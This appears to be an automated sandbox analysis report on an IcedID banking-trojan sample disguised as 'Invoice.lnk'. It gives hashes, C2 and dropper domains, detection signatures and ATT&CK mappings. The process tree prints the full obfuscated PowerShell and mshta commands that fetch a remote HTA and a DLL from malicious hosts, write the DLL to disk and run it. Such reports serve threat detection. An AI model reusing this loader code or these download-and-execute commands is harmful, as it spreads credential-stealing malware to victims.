icedid | d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae

General

Target

Invoice.lnk
Size

178KB
MD5

c29d6fc092698aafe01ece64da57254f
SHA1

523e8303f8d6853ef499b742ef5e9d7485803a88
SHA256

d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae
SHA512

fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50

Score

10^/10

icedid 1487191074 banker loader suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://comradespoon.com/5h.hta

Extracted

Family

icedid

Campaign

1487191074

C2

vneastruzz.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

4 1596 mshta.exe
5 1512 powershell.exe
7 1896 rundll32.exe
Downloads MZ/PE file
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

1896 rundll32.exe
1896 rundll32.exe
1896 rundll32.exe
1896 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exerundll32.exe

pid process

1308 powershell.exe
1512 powershell.exe
1896 rundll32.exe
1896 rundll32.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1308 powershell.exe
Token: SeDebugPrivilege 1512 powershell.exe

flow	pid	process
4	1596	mshta.exe
5	1512	powershell.exe
7	1896	rundll32.exe

pid	process
1896	rundll32.exe
1896	rundll32.exe
1896	rundll32.exe
1896	rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1308	powershell.exe
1512	powershell.exe
1896	rundll32.exe
1896	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exe

description	pid	process	target process
PID 1464 wrote to memory of 1308	1464	cmd.exe	powershell.exe
PID 1464 wrote to memory of 1308	1464	cmd.exe	powershell.exe
PID 1464 wrote to memory of 1308	1464	cmd.exe	powershell.exe
PID 1308 wrote to memory of 1596	1308	powershell.exe	mshta.exe
PID 1308 wrote to memory of 1596	1308	powershell.exe	mshta.exe
PID 1308 wrote to memory of 1596	1308	powershell.exe	mshta.exe
PID 1596 wrote to memory of 1512	1596	mshta.exe	powershell.exe
PID 1596 wrote to memory of 1512	1596	mshta.exe	powershell.exe
PID 1596 wrote to memory of 1512	1596	mshta.exe	powershell.exe
PID 1512 wrote to memory of 1896	1512	powershell.exe	rundll32.exe
PID 1512 wrote to memory of 1896	1512	powershell.exe	rundll32.exe
PID 1512 wrote to memory of 1896	1512	powershell.exe	rundll32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta
3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1896

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.dll

Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
\ProgramData\1.dll

Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
\ProgramData\1.dll

Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
\ProgramData\1.dll

Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
\ProgramData\1.dll

Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
memory/1308-95-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1308-94-0x000007FEF2E20000-0x000007FEF397D000-memory.dmp

Filesize
11.4MB

Download
memory/1308-96-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1308-93-0x000007FEF3980000-0x000007FEF43A3000-memory.dmp

Filesize
10.1MB

Download
memory/1308-98-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1308-99-0x000000000261B000-0x000000000263A000-memory.dmp

Filesize
124KB

Download
memory/1308-88-0x0000000000000000-mapping.dmp

Download
memory/1464-54-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/1512-105-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1512-107-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1512-106-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/1512-104-0x000007FEF37C0000-0x000007FEF431D000-memory.dmp

Filesize
11.4MB

Download
memory/1512-103-0x000007FEF4320000-0x000007FEF4D43000-memory.dmp

Filesize
10.1MB

Download
memory/1512-101-0x0000000000000000-mapping.dmp

Download
memory/1512-115-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1512-114-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1596-97-0x0000000000000000-mapping.dmp

Download
memory/1896-108-0x0000000000000000-mapping.dmp

Download
memory/1896-116-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads